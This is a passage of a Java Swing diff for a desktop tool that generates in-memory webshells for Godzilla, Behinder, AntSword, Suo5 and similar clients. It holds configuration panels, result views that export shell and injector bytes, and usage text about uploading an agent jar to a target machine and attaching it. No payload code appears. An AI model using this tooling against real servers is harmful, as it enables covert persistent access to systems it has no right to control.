||||
import com.reajason.javaweb.desktop.memshell.service.CustomClassNameParser;
|
||||
import com.reajason.javaweb.desktop.memshell.ui.panel.tool.*;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
import java.awt.*;
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
|
||||
public class MainConfigPanel extends JPanel {
|
||||
private final MemShellFormController controller;
|
||||
private final Runnable refreshAll;
|
||||
private boolean updating;
|
||||
|
||||
private final JComboBox<String> serverCombo = new JComboBox<>();
|
||||
private final JComboBox<String> serverVersionCombo = new JComboBox<>();
|
||||
private final JComboBox<String> shellToolCombo = new JComboBox<>();
|
||||
private final JComboBox<String> targetJdkCombo = new JComboBox<>();
|
||||
|
||||
private final JCheckBox debugCheck = new JCheckBox("调试模式");
|
||||
private final JCheckBox probeCheck = new JCheckBox("回显模式");
|
||||
private final JCheckBox bypassCheck = new JCheckBox("绕过模块限制");
|
||||
private final JCheckBox lambdaCheck = new JCheckBox("Lambda 类名后缀");
|
||||
private final JCheckBox shrinkCheck = new JCheckBox("缩小字节码");
|
||||
private final JCheckBox staticInitCheck = new JCheckBox("静态初始化");
|
||||
|
||||
private final JPanel corePanel;
|
||||
private final JPanel toolPanelWrap;
|
||||
private final JPanel toolCardPanel = new JPanel(new CardLayout());
|
||||
private final Map<String, RefreshableToolPanel> toolPanels = new LinkedHashMap<>();
|
||||
|
||||
public MainConfigPanel(MemShellFormController controller, CustomClassNameParser parser, Runnable refreshAll) {
|
||||
super(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[]6[]"));
|
||||
this.controller = controller;
|
||||
this.refreshAll = refreshAll;
|
||||
|
||||
corePanel = new JPanel(new MigLayout("insets 8, fillx, gapx 8, gapy 2, wrap 2", "[grow,fill][grow,fill]", "[]4[]"));
|
||||
corePanel.setBorder(BorderFactory.createTitledBorder("核心配置"));
|
||||
corePanel.add(labeled("服务类型", serverCombo), "growx");
|
||||
corePanel.add(labeled("服务版本", serverVersionCombo), "growx");
|
||||
corePanel.add(labeled("内存马工具", shellToolCombo), "growx");
|
||||
corePanel.add(labeled("JRE 版本", targetJdkCombo), "growx");
|
||||
|
||||
JPanel togglePanel = new JPanel(new MigLayout("insets 0, gapx 8, gapy 2, wrap 3", "[grow,fill][grow,fill][grow,fill]", "[]"));
|
||||
togglePanel.add(debugCheck);
|
||||
togglePanel.add(probeCheck);
|
||||
togglePanel.add(bypassCheck);
|
||||
togglePanel.add(lambdaCheck);
|
||||
togglePanel.add(shrinkCheck);
|
||||
togglePanel.add(staticInitCheck);
|
||||
corePanel.add(togglePanel, "span 2, growx");
|
||||
add(corePanel, "growx");
|
||||
|
||||
toolPanelWrap = new JPanel(new BorderLayout());
|
||||
toolPanelWrap.setBorder(BorderFactory.createTitledBorder("内存马功能"));
|
||||
// Keep the active tool panel at preferred height to avoid large blank sections.
|
||||
toolPanelWrap.add(toolCardPanel, BorderLayout.NORTH);
|
||||
add(toolPanelWrap, "growx");
|
||||
|
||||
registerToolPanel("Godzilla", new GodzillaToolPanel(controller, refreshAll));
|
||||
registerToolPanel("Command", new CommandToolPanel(controller, refreshAll));
|
||||
registerToolPanel("Behinder", new BehinderToolPanel(controller, refreshAll));
|
||||
registerToolPanel("AntSword", new AntSwordToolPanel(controller, refreshAll));
|
||||
registerToolPanel("Suo5", new Suo5ToolPanel(controller, refreshAll));
|
||||
registerToolPanel("Suo5v2", new Suo5ToolPanel(controller, refreshAll));
|
||||
registerToolPanel("NeoreGeorg", new NeoRegToolPanel(controller, refreshAll));
|
||||
registerToolPanel("Proxy", new ProxyToolPanel(controller, refreshAll));
|
||||
registerToolPanel("Custom", new CustomToolPanel(controller, parser, refreshAll));
|
||||
|
||||
bindEvents();
|
||||
}
|
||||
|
||||
private void registerToolPanel(String key, RefreshableToolPanel panel) {
|
||||
toolPanels.put(key, panel);
|
||||
toolCardPanel.add((Component) panel, key);
|
||||
}
|
||||
|
||||
private JPanel labeled(String label, JComponent component) {
|
||||
JPanel p = new JPanel(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[]1[]"));
|
||||
p.add(new JLabel(label));
|
||||
p.add(component, "growx");
|
||||
return p;
|
||||
}
|
||||
|
||||
private void bindEvents() {
|
||||
serverCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = serverCombo.getSelectedItem();
|
||||
if (item != null) {
|
||||
controller.setServer(String.valueOf(item));
|
||||
refreshAll.run();
|
||||
}
|
||||
});
|
||||
serverVersionCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = serverVersionCombo.getSelectedItem();
|
||||
if (item != null) controller.setServerVersion(String.valueOf(item));
|
||||
});
|
||||
shellToolCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = shellToolCombo.getSelectedItem();
|
||||
if (item != null) {
|
||||
controller.setShellTool(String.valueOf(item));
|
||||
refreshAll.run();
|
||||
}
|
||||
});
|
||||
targetJdkCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = targetJdkCombo.getSelectedItem();
|
||||
if (item != null) {
|
||||
controller.setTargetJdkVersion(String.valueOf(item));
|
||||
refreshAll.run();
|
||||
}
|
||||
});
|
||||
|
||||
debugCheck.addActionListener(e -> controller.setDebug(debugCheck.isSelected()));
|
||||
probeCheck.addActionListener(e -> controller.setProbe(probeCheck.isSelected()));
|
||||
bypassCheck.addActionListener(e -> controller.setByPassJavaModule(bypassCheck.isSelected()));
|
||||
lambdaCheck.addActionListener(e -> controller.setLambdaSuffix(lambdaCheck.isSelected()));
|
||||
shrinkCheck.addActionListener(e -> controller.setShrink(shrinkCheck.isSelected()));
|
||||
staticInitCheck.addActionListener(e -> controller.setStaticInitialize(staticInitCheck.isSelected()));
|
||||
}
|
||||
|
||||
public void refreshFromController() {
|
||||
MemShellFormState s = controller.getState();
|
||||
updating = true;
|
||||
try {
|
||||
setComboItems(serverCombo, controller.getServers(), s.getServer());
|
||||
setComboItems(serverVersionCombo, controller.getServerVersionOptions(), s.getServerVersion());
|
||||
setComboItems(shellToolCombo, controller.getShellTools(), s.getShellTool());
|
||||
setComboItems(targetJdkCombo, controller.getConfigCatalogService().getTargetJdkOptions(), s.getTargetJdkVersion());
|
||||
|
||||
debugCheck.setSelected(s.isDebug());
|
||||
probeCheck.setSelected(s.isProbe());
|
||||
bypassCheck.setSelected(s.isByPassJavaModule());
|
||||
lambdaCheck.setSelected(s.isLambdaSuffix());
|
||||
shrinkCheck.setSelected(s.isShrink());
|
||||
staticInitCheck.setSelected(s.isStaticInitialize());
|
||||
} finally {
|
||||
updating = false;
|
||||
}
|
||||
|
||||
CardLayout cardLayout = (CardLayout) toolCardPanel.getLayout();
|
||||
cardLayout.show(toolCardPanel, s.getShellTool());
|
||||
RefreshableToolPanel toolPanel = toolPanels.get(s.getShellTool());
|
||||
if (toolPanel != null) {
|
||||
toolPanel.refreshFromController();
|
||||
}
|
||||
}
|
||||
|
||||
private void setComboItems(JComboBox<String> combo, List<String> items, String selected) {
|
||||
combo.removeAllItems();
|
||||
for (String item : items) combo.addItem(item);
|
||||
if (selected != null) combo.setSelectedItem(selected);
|
||||
}
|
||||
|
||||
public JComponent getCorePanelComponent() {
|
||||
return corePanel;
|
||||
}
|
||||
|
||||
public JComponent getToolPanelComponent() {
|
||||
return toolPanelWrap;
|
||||
}
|
||||
}
|
||||
+131
@@ -0,0 +1,131 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerEntryModel;
|
||||
import com.reajason.javaweb.desktop.memshell.model.PackerSchemaFieldModel;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.DocumentEvent;
|
||||
import javax.swing.event.DocumentListener;
|
||||
import java.util.LinkedHashMap;
|
||||
import java.util.List;
|
||||
import java.util.Map;
|
||||
|
||||
public class PackageConfigPanel extends JPanel {
|
||||
private final MemShellFormController controller;
|
||||
private final Runnable refreshAll;
|
||||
private boolean updating;
|
||||
|
||||
private final JComboBox<PackerEntryModel> packerCombo = new JComboBox<>();
|
||||
private final JPanel dynamicFieldsPanel = new JPanel(new MigLayout("insets 0, fillx, gapx 8, gapy 2, wrap 2", "[grow,fill][grow,fill]", "[]"));
|
||||
|
||||
public PackageConfigPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(new MigLayout("insets 8, fillx, wrap 1", "[grow,fill]", "[]4[]"));
|
||||
this.controller = controller;
|
||||
this.refreshAll = refreshAll;
|
||||
setBorder(BorderFactory.createTitledBorder("打包配置"));
|
||||
|
||||
JPanel top = new JPanel(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[]1[]"));
|
||||
top.add(new JLabel("打包方式"));
|
||||
top.add(packerCombo, "growx");
|
||||
add(top, "growx");
|
||||
add(dynamicFieldsPanel, "growx");
|
||||
|
||||
packerCombo.setRenderer(new DefaultListCellRenderer() {
|
||||
@Override
|
||||
public java.awt.Component getListCellRendererComponent(JList<?> list, Object value, int index, boolean isSelected, boolean cellHasFocus) {
|
||||
super.getListCellRendererComponent(list, value, index, isSelected, cellHasFocus);
|
||||
if (value instanceof PackerEntryModel) {
|
||||
PackerEntryModel p = (PackerEntryModel) value;
|
||||
setText(p.displayLabel());
|
||||
}
|
||||
return this;
|
||||
}
|
||||
});
|
||||
|
||||
packerCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = packerCombo.getSelectedItem();
|
||||
if (item instanceof PackerEntryModel) {
|
||||
PackerEntryModel p = (PackerEntryModel) item;
|
||||
controller.setPacker(p.getName());
|
||||
refreshAll.run();
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
public void refreshFromController() {
|
||||
updating = true;
|
||||
try {
|
||||
DefaultComboBoxModel<PackerEntryModel> model = new DefaultComboBoxModel<>();
|
||||
List<PackerEntryModel> filtered = controller.getFilteredPackers();
|
||||
PackerEntryModel selected = controller.getSelectedPackerEntry();
|
||||
for (PackerEntryModel p : filtered) model.addElement(p);
|
||||
packerCombo.setModel(model);
|
||||
if (selected != null) packerCombo.setSelectedItem(selected);
|
||||
rebuildDynamicFields(controller.getSelectedPackerFields(), controller.getPackerCustomConfig());
|
||||
} finally {
|
||||
updating = false;
|
||||
}
|
||||
}
|
||||
|
||||
private void rebuildDynamicFields(List<PackerSchemaFieldModel> fields, Map<String, Object> currentValues) {
|
||||
dynamicFieldsPanel.removeAll();
|
||||
if (fields == null || fields.isEmpty()) {
|
||||
dynamicFieldsPanel.revalidate();
|
||||
dynamicFieldsPanel.repaint();
|
||||
return;
|
||||
}
|
||||
for (PackerSchemaFieldModel field : fields) {
|
||||
String type = field.getType();
|
||||
if (!"BOOLEAN".equals(type) && !"STRING".equals(type) && !"ENUM".equals(type) && !"INTEGER".equals(type)) {
|
||||
continue;
|
||||
}
|
||||
Object value = currentValues.get(field.getKey());
|
||||
if ("BOOLEAN".equals(type)) {
|
||||
JCheckBox check = new JCheckBox(field.getKey());
|
||||
check.setSelected(Boolean.TRUE.equals(value));
|
||||
check.addActionListener(e -> controller.setPackerCustomField(field.getKey(), check.isSelected()));
|
||||
dynamicFieldsPanel.add(check, "span 2, growx");
|
||||
continue;
|
||||
}
|
||||
dynamicFieldsPanel.add(new JLabel(field.getKey()));
|
||||
if ("ENUM".equals(type)) {
|
||||
JComboBox<String> combo = new JComboBox<>();
|
||||
for (PackerSchemaFieldModel.Option option : field.getOptions()) {
|
||||
combo.addItem(option.getValue());
|
||||
}
|
||||
if (value != null) combo.setSelectedItem(String.valueOf(value));
|
||||
combo.addActionListener(e -> controller.setPackerCustomField(field.getKey(), combo.getSelectedItem()));
|
||||
dynamicFieldsPanel.add(combo, "growx");
|
||||
} else {
|
||||
JTextField text = new JTextField(value == null ? "" : String.valueOf(value));
|
||||
text.getDocument().addDocumentListener(new DocumentListener() {
|
||||
@Override public void insertUpdate(DocumentEvent e) { changed(); }
|
||||
@Override public void removeUpdate(DocumentEvent e) { changed(); }
|
||||
@Override public void changedUpdate(DocumentEvent e) { changed(); }
|
||||
private void changed() {
|
||||
if (updating) return;
|
||||
if ("INTEGER".equals(type)) {
|
||||
String raw = text.getText().trim();
|
||||
if (raw.isEmpty()) {
|
||||
controller.setPackerCustomField(field.getKey(), null);
|
||||
} else {
|
||||
try {
|
||||
controller.setPackerCustomField(field.getKey(), Integer.parseInt(raw));
|
||||
} catch (NumberFormatException ignored) {
|
||||
}
|
||||
}
|
||||
} else {
|
||||
controller.setPackerCustomField(field.getKey(), text.getText());
|
||||
}
|
||||
}
|
||||
});
|
||||
dynamicFieldsPanel.add(text, "growx");
|
||||
}
|
||||
}
|
||||
dynamicFieldsPanel.revalidate();
|
||||
dynamicFieldsPanel.repaint();
|
||||
}
|
||||
}
|
||||
+249
@@ -0,0 +1,249 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.model.DesktopMemShellGenerateResult;
|
||||
import com.reajason.javaweb.desktop.memshell.util.ClipboardUtil;
|
||||
import com.reajason.javaweb.desktop.memshell.util.FileSaveUtil;
|
||||
import com.reajason.javaweb.desktop.memshell.util.SwingUiUtil;
|
||||
import com.reajason.javaweb.memshell.MemShellResult;
|
||||
import com.reajason.javaweb.memshell.config.*;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.border.Border;
|
||||
import java.awt.*;
|
||||
import java.io.IOException;
|
||||
|
||||
public class ResultPanel extends JPanel {
|
||||
private final JTabbedPane tabs = new JTabbedPane();
|
||||
private final BasicInfoView basicInfoView = new BasicInfoView();
|
||||
private final JTextArea packResultArea = createTextArea();
|
||||
private final JTextArea shellArea = createTextArea();
|
||||
private final JTextArea injectorArea = createTextArea();
|
||||
private final JLabel packHeaderLabel = new JLabel("未生成");
|
||||
private DesktopMemShellGenerateResult current;
|
||||
|
||||
public ResultPanel() {
|
||||
super(new BorderLayout());
|
||||
|
||||
JPanel packTab = new JPanel(new MigLayout("insets 6, fill, wrap 1", "[grow,fill]", "[][grow]"));
|
||||
packTab.add(wrapBasicInfoPanel(), "growx");
|
||||
packTab.add(wrapPackResultPanel(), "grow, push");
|
||||
|
||||
tabs.addTab("生成结果", packTab);
|
||||
tabs.addTab("内存马", wrapBase64Panel("内存马类字节(Base64)", shellArea, true, true));
|
||||
tabs.addTab("注入器", wrapBase64Panel("注入器类字节(Base64)", injectorArea, false, true));
|
||||
add(tabs, BorderLayout.CENTER);
|
||||
}
|
||||
|
||||
private JPanel wrapBasicInfoPanel() {
|
||||
JPanel p = new JPanel(new BorderLayout());
|
||||
JPanel top = new JPanel(new FlowLayout(FlowLayout.LEFT, 6, 3));
|
||||
top.add(new JLabel("基本信息"));
|
||||
|
||||
Border cardBorder = BorderFactory.createCompoundBorder(
|
||||
BorderFactory.createLineBorder(UIManager.getColor("Component.borderColor") == null ? Color.LIGHT_GRAY : UIManager.getColor("Component.borderColor")),
|
||||
BorderFactory.createEmptyBorder(6, 6, 6, 6)
|
||||
);
|
||||
p.setBorder(cardBorder);
|
||||
p.add(top, BorderLayout.NORTH);
|
||||
p.add(basicInfoView, BorderLayout.CENTER);
|
||||
return p;
|
||||
}
|
||||
|
||||
private JPanel wrapPackResultPanel() {
|
||||
JPanel p = new JPanel(new BorderLayout());
|
||||
JPanel top = new JPanel(new FlowLayout(FlowLayout.LEFT, 6, 3));
|
||||
JButton copyBtn = new JButton("复制");
|
||||
JButton saveBtn = new JButton("保存");
|
||||
copyBtn.addActionListener(e -> ClipboardUtil.copyText(packResultArea.getText()));
|
||||
saveBtn.addActionListener(e -> savePackResult());
|
||||
top.add(new JLabel("打包结果"));
|
||||
top.add(packHeaderLabel);
|
||||
top.add(copyBtn);
|
||||
top.add(saveBtn);
|
||||
p.add(top, BorderLayout.NORTH);
|
||||
p.add(new JScrollPane(packResultArea), BorderLayout.CENTER);
|
||||
return p;
|
||||
}
|
||||
|
||||
private JPanel wrapBase64Panel(String title, JTextArea area, boolean shell, boolean saveClass) {
|
||||
JPanel p = new JPanel(new BorderLayout());
|
||||
JPanel top = new JPanel(new FlowLayout(FlowLayout.LEFT, 6, 3));
|
||||
JButton copyBtn = new JButton("复制");
|
||||
JButton saveBtn = new JButton(saveClass ? "保存 .class" : "保存");
|
||||
copyBtn.addActionListener(e -> ClipboardUtil.copyText(area.getText()));
|
||||
saveBtn.addActionListener(e -> {
|
||||
if (current == null) return;
|
||||
try {
|
||||
MemShellResult r = current.getMemShellResult();
|
||||
if (shell) {
|
||||
FileSaveUtil.saveBase64AsBytes(this, simpleClassFileName(r.getShellClassName()), r.getShellBytesBase64Str(), "class");
|
||||
} else {
|
||||
FileSaveUtil.saveBase64AsBytes(this, simpleClassFileName(r.getInjectorClassName()), r.getInjectorBytesBase64Str(), "class");
|
||||
}
|
||||
} catch (Exception ex) {
|
||||
SwingUiUtil.showError(this, "保存失败: " + ex.getMessage());
|
||||
}
|
||||
});
|
||||
top.add(new JLabel(title));
|
||||
top.add(copyBtn);
|
||||
top.add(saveBtn);
|
||||
p.add(top, BorderLayout.NORTH);
|
||||
p.add(new JScrollPane(area), BorderLayout.CENTER);
|
||||
return p;
|
||||
}
|
||||
|
||||
private JTextArea createTextArea() {
|
||||
JTextArea area = new JTextArea();
|
||||
area.setEditable(false);
|
||||
area.setLineWrap(true);
|
||||
area.setWrapStyleWord(true);
|
||||
area.setFont(new Font(Font.MONOSPACED, Font.PLAIN, 12));
|
||||
return area;
|
||||
}
|
||||
|
||||
public void showResult(DesktopMemShellGenerateResult result) {
|
||||
this.current = result;
|
||||
MemShellResult r = result.getMemShellResult();
|
||||
basicInfoView.setResult(result);
|
||||
packHeaderLabel.setText(result.getPackMethod() + (result.getPackResult() == null ? "" : " (" + result.getPackResult().length() + ")"));
|
||||
if (result.isJarOutput() || result.isAgentOutput()) {
|
||||
packResultArea.setText(buildUsageText(result));
|
||||
} else {
|
||||
packResultArea.setText(result.getPackResult());
|
||||
}
|
||||
shellArea.setText(r.getShellBytesBase64Str());
|
||||
injectorArea.setText(r.getInjectorBytesBase64Str());
|
||||
}
|
||||
|
||||
public void clear() {
|
||||
current = null;
|
||||
basicInfoView.clear();
|
||||
packResultArea.setText("");
|
||||
shellArea.setText("");
|
||||
injectorArea.setText("");
|
||||
packHeaderLabel.setText("未生成");
|
||||
}
|
||||
|
||||
private String buildUsageText(DesktopMemShellGenerateResult result) {
|
||||
if (result.isAgentOutput()) {
|
||||
return "1. 点击保存导出 Agent Jar\n2. 上传到目标机器\n3. 使用 jattach/attach 方式加载\n4. 按生成配置尝试连接/触发\n\n(下方“保存”按钮会保存打包后的 Jar)";
|
||||
}
|
||||
return "1. 点击保存导出 Jar\n2. 按目标环境触发类加载\n3. 使用基本信息中的参数连接内存马\n\n(下方“保存”按钮会保存打包后的 Jar)";
|
||||
}
|
||||
|
||||
private void savePackResult() {
|
||||
if (current == null) return;
|
||||
try {
|
||||
if (current.isJarOutput() || current.isAgentOutput()) {
|
||||
String baseName = current.getMemShellResult().getShellConfig().getServer() + current.getMemShellResult().getShellConfig().getShellTool() + (current.isAgentOutput() ? "MemShellAgent" : "MemShell");
|
||||
FileSaveUtil.saveBase64AsBytes(this, baseName + ".jar", current.getPackResult(), "jar");
|
||||
} else {
|
||||
FileSaveUtil.saveText(this, current.getPackMethod() + ".txt", current.getPackResult());
|
||||
}
|
||||
} catch (Exception ex) {
|
||||
SwingUiUtil.showError(this, "保存失败: " + ex.getMessage());
|
||||
}
|
||||
}
|
||||
|
||||
private static String simpleClassFileName(String className) {
|
||||
if (className == null || className.trim().isEmpty()) return "output.class";
|
||||
int idx = className.lastIndexOf('.');
|
||||
return (idx >= 0 ? className.substring(idx + 1) : className) + ".class";
|
||||
}
|
||||
|
||||
public JComponent getBasicInfoComponent() {
|
||||
return basicInfoView;
|
||||
}
|
||||
|
||||
static final class BasicInfoView extends JPanel {
|
||||
private final JPanel content = new JPanel(new MigLayout("insets 0, fillx, gapx 10, gapy 2, wrap 2", "[right]10[grow,fill]", "[]"));
|
||||
|
||||
BasicInfoView() {
|
||||
super(new BorderLayout());
|
||||
add(content, BorderLayout.CENTER);
|
||||
clear();
|
||||
}
|
||||
|
||||
void clear() {
|
||||
content.removeAll();
|
||||
content.revalidate();
|
||||
content.repaint();
|
||||
}
|
||||
|
||||
void setResult(DesktopMemShellGenerateResult result) {
|
||||
content.removeAll();
|
||||
MemShellResult r = result.getMemShellResult();
|
||||
ShellConfig shellConfig = r.getShellConfig();
|
||||
ShellToolConfig toolConfig = r.getShellToolConfig();
|
||||
appendToolRows(shellConfig, toolConfig);
|
||||
row("注入器类名", r.getInjectorClassName() + " (" + r.getInjectorSize() + " bytes)");
|
||||
row("内存马类名", r.getShellClassName() + " (" + r.getShellSize() + " bytes)");
|
||||
content.revalidate();
|
||||
content.repaint();
|
||||
}
|
||||
|
||||
private void appendToolRows(ShellConfig shellConfig, ShellToolConfig toolConfig) {
|
||||
if (toolConfig == null) {
|
||||
row("参数", "无");
|
||||
return;
|
||||
}
|
||||
String tool = shellConfig == null ? null : shellConfig.getShellTool();
|
||||
if (toolConfig instanceof GodzillaConfig) {
|
||||
GodzillaConfig c = (GodzillaConfig) toolConfig;
|
||||
row("密码", c.getPass());
|
||||
row("密钥", c.getKey());
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
} else if (toolConfig instanceof BehinderConfig) {
|
||||
BehinderConfig c = (BehinderConfig) toolConfig;
|
||||
row("密码", c.getPass());
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
} else if (toolConfig instanceof CommandConfig) {
|
||||
CommandConfig c = (CommandConfig) toolConfig;
|
||||
row("参数名", c.getParamName());
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
row("加密器", c.getEncryptor() == null ? "" : c.getEncryptor().name());
|
||||
row("实现类", c.getImplementationClass() == null ? "" : c.getImplementationClass().name());
|
||||
if (c.getTemplate() != null) {
|
||||
row("命令模板", c.getTemplate());
|
||||
}
|
||||
} else if (toolConfig instanceof AntSwordConfig) {
|
||||
AntSwordConfig c = (AntSwordConfig) toolConfig;
|
||||
row("密码", c.getPass());
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
} else if (toolConfig instanceof Suo5Config) {
|
||||
Suo5Config c = (Suo5Config) toolConfig;
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
} else if (toolConfig instanceof ProxyConfig) {
|
||||
ProxyConfig c = (ProxyConfig) toolConfig;
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
} else if (toolConfig instanceof NeoreGeorgConfig) {
|
||||
NeoreGeorgConfig c = (NeoreGeorgConfig) toolConfig;
|
||||
row("请求头", c.getHeaderName() + ": " + c.getHeaderValue());
|
||||
} else if (toolConfig instanceof CustomConfig) {
|
||||
CustomConfig c = (CustomConfig) toolConfig;
|
||||
String v = c.getShellClassBase64();
|
||||
row("自定义类(Base64)", v == null ? "" : (v.length() > 32 ? v.substring(0, 32) + "..." : v));
|
||||
} else if (tool != null) {
|
||||
row("工具类型", tool);
|
||||
}
|
||||
}
|
||||
|
||||
private void row(String key, String value) {
|
||||
addValueRow(key, value);
|
||||
}
|
||||
|
||||
private void addValueRow(String key, String value) {
|
||||
String text = value == null ? "" : value;
|
||||
content.add(new JLabel(key));
|
||||
JTextField tf = new JTextField(text);
|
||||
tf.setEditable(false);
|
||||
tf.setBorder(BorderFactory.createEmptyBorder(1, 4, 1, 4));
|
||||
tf.setOpaque(true);
|
||||
tf.setBackground(UIManager.getColor("Panel.background"));
|
||||
tf.setToolTipText(value == null ? "" : value);
|
||||
tf.setToolTipText(text);
|
||||
content.add(tf, "growx, wrap");
|
||||
}
|
||||
}
|
||||
}
|
||||
+118
@@ -0,0 +1,118 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
import net.miginfocom.swing.MigLayout;
|
||||
|
||||
import javax.swing.*;
|
||||
import javax.swing.event.DocumentEvent;
|
||||
import javax.swing.event.DocumentListener;
|
||||
import java.awt.*;
|
||||
import java.util.List;
|
||||
import java.util.function.Consumer;
|
||||
|
||||
public abstract class AbstractToolPanel extends JPanel implements RefreshableToolPanel {
|
||||
protected final MemShellFormController controller;
|
||||
protected final Runnable refreshAll;
|
||||
protected boolean updating;
|
||||
|
||||
protected final JComboBox<String> shellTypeCombo = new JComboBox<>();
|
||||
protected final JTextField urlPatternField = new JTextField();
|
||||
protected final JPanel shellTypeAndUrlRow = new JPanel(new MigLayout("insets 0, fillx, gapx 8", "[50%,fill][50%,fill]", "[]"));
|
||||
protected JPanel urlPatternRow = new JPanel(new BorderLayout());
|
||||
protected final JCheckBox randomClassNameCheck = new JCheckBox("随机类名");
|
||||
protected final JPanel manualClassPanel = new JPanel(new MigLayout("insets 0, fillx, gapx 8, gapy 2, wrap 2", "[grow,fill][grow,fill]", "[]"));
|
||||
protected final JTextField shellClassNameField = new JTextField();
|
||||
protected final JTextField injectorClassNameField = new JTextField();
|
||||
|
||||
protected AbstractToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
this.controller = controller;
|
||||
this.refreshAll = refreshAll;
|
||||
setLayout(new MigLayout("insets 6, fillx, gapx 8, gapy 2, wrap 2", "[grow,fill][grow,fill]", "[]4[]"));
|
||||
buildCommonShellTypeSection();
|
||||
}
|
||||
|
||||
protected void buildCommonShellTypeSection() {
|
||||
shellTypeAndUrlRow.add(labeled("内存马挂载类型", shellTypeCombo), "growx");
|
||||
urlPatternRow = labeled("请求路径", urlPatternField);
|
||||
shellTypeAndUrlRow.add(urlPatternRow, "growx");
|
||||
add(shellTypeAndUrlRow, "span 2, growx, wrap");
|
||||
|
||||
shellTypeCombo.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
Object item = shellTypeCombo.getSelectedItem();
|
||||
if (item != null) {
|
||||
controller.setShellType(String.valueOf(item));
|
||||
refreshAll.run();
|
||||
}
|
||||
});
|
||||
bindText(urlPatternField, controller::setUrlPattern);
|
||||
}
|
||||
|
||||
protected void addRandomClassSection() {
|
||||
add(randomClassNameCheck, "span 2, split 2, wrap");
|
||||
manualClassPanel.add(labeled("内存马类名", shellClassNameField), "growx");
|
||||
manualClassPanel.add(labeled("注入器类名", injectorClassNameField), "growx");
|
||||
add(manualClassPanel, "span 2, growx, hidemode 3");
|
||||
|
||||
randomClassNameCheck.addActionListener(e -> {
|
||||
if (updating) return;
|
||||
controller.setRandomClassName(randomClassNameCheck.isSelected());
|
||||
refreshAll.run();
|
||||
});
|
||||
bindText(shellClassNameField, controller::setShellClassName);
|
||||
bindText(injectorClassNameField, controller::setInjectorClassName);
|
||||
}
|
||||
|
||||
protected JPanel labeled(String label, JComponent component) {
|
||||
JPanel p = new JPanel(new MigLayout("insets 0, fillx, wrap 1", "[grow,fill]", "[]1[]"));
|
||||
p.add(new JLabel(label), "growx");
|
||||
p.add(component, "growx");
|
||||
return p;
|
||||
}
|
||||
|
||||
protected void setComboItems(JComboBox<String> combo, List<String> items, String selected) {
|
||||
combo.removeAllItems();
|
||||
for (String item : items) combo.addItem(item);
|
||||
if (selected != null) combo.setSelectedItem(selected);
|
||||
}
|
||||
|
||||
protected void bindText(JTextField field, Consumer<String> setter) {
|
||||
field.getDocument().addDocumentListener(new DocumentListener() {
|
||||
@Override
|
||||
public void insertUpdate(DocumentEvent e) {
|
||||
changed();
|
||||
}
|
||||
|
||||
@Override
|
||||
public void removeUpdate(DocumentEvent e) {
|
||||
changed();
|
||||
}
|
||||
|
||||
@Override
|
||||
public void changedUpdate(DocumentEvent e) {
|
||||
changed();
|
||||
}
|
||||
|
||||
private void changed() {
|
||||
if (updating) return;
|
||||
setter.accept(field.getText());
|
||||
}
|
||||
});
|
||||
}
|
||||
|
||||
protected void applyCommonState(MemShellFormState s) {
|
||||
updating = true;
|
||||
try {
|
||||
setComboItems(shellTypeCombo, controller.getShellTypesForCurrentTool(), s.getShellType());
|
||||
urlPatternField.setText(s.getUrlPattern());
|
||||
randomClassNameCheck.setSelected(s.isRandomClassName());
|
||||
boolean nextManualClassVisible = !s.isRandomClassName();
|
||||
manualClassPanel.setVisible(nextManualClassVisible);
|
||||
shellClassNameField.setText(s.getShellClassName());
|
||||
injectorClassNameField.setText(s.getInjectorClassName());
|
||||
} finally {
|
||||
updating = false;
|
||||
}
|
||||
}
|
||||
}
|
||||
+34
@@ -0,0 +1,34 @@
|
||||
package com.reajason.javaweb.desktop.memshell.ui.panel.tool;
|
||||
|
||||
import com.reajason.javaweb.desktop.memshell.controller.MemShellFormController;
|
||||
import com.reajason.javaweb.desktop.memshell.model.MemShellFormState;
|
||||
|
||||
import javax.swing.*;
|
||||
|
||||
public class AntSwordToolPanel extends AbstractToolPanel {
|
||||
private final JTextField passField = new JTextField();
|
||||
private final JTextField headerNameField = new JTextField();
|
||||
private final JTextField headerValueField = new JTextField();
|
||||
|
||||
public AntSwordToolPanel(MemShellFormController controller, Runnable refreshAll) {
|
||||
super(controller, refreshAll);
|
||||
add(labeled("密码(可选)", passField), "span 2, growx, wrap");
|
||||
add(labeled("请求头名", headerNameField), "growx");
|
||||
add(labeled("请求头值(可选)", headerValueField), "growx, wrap");
|
||||
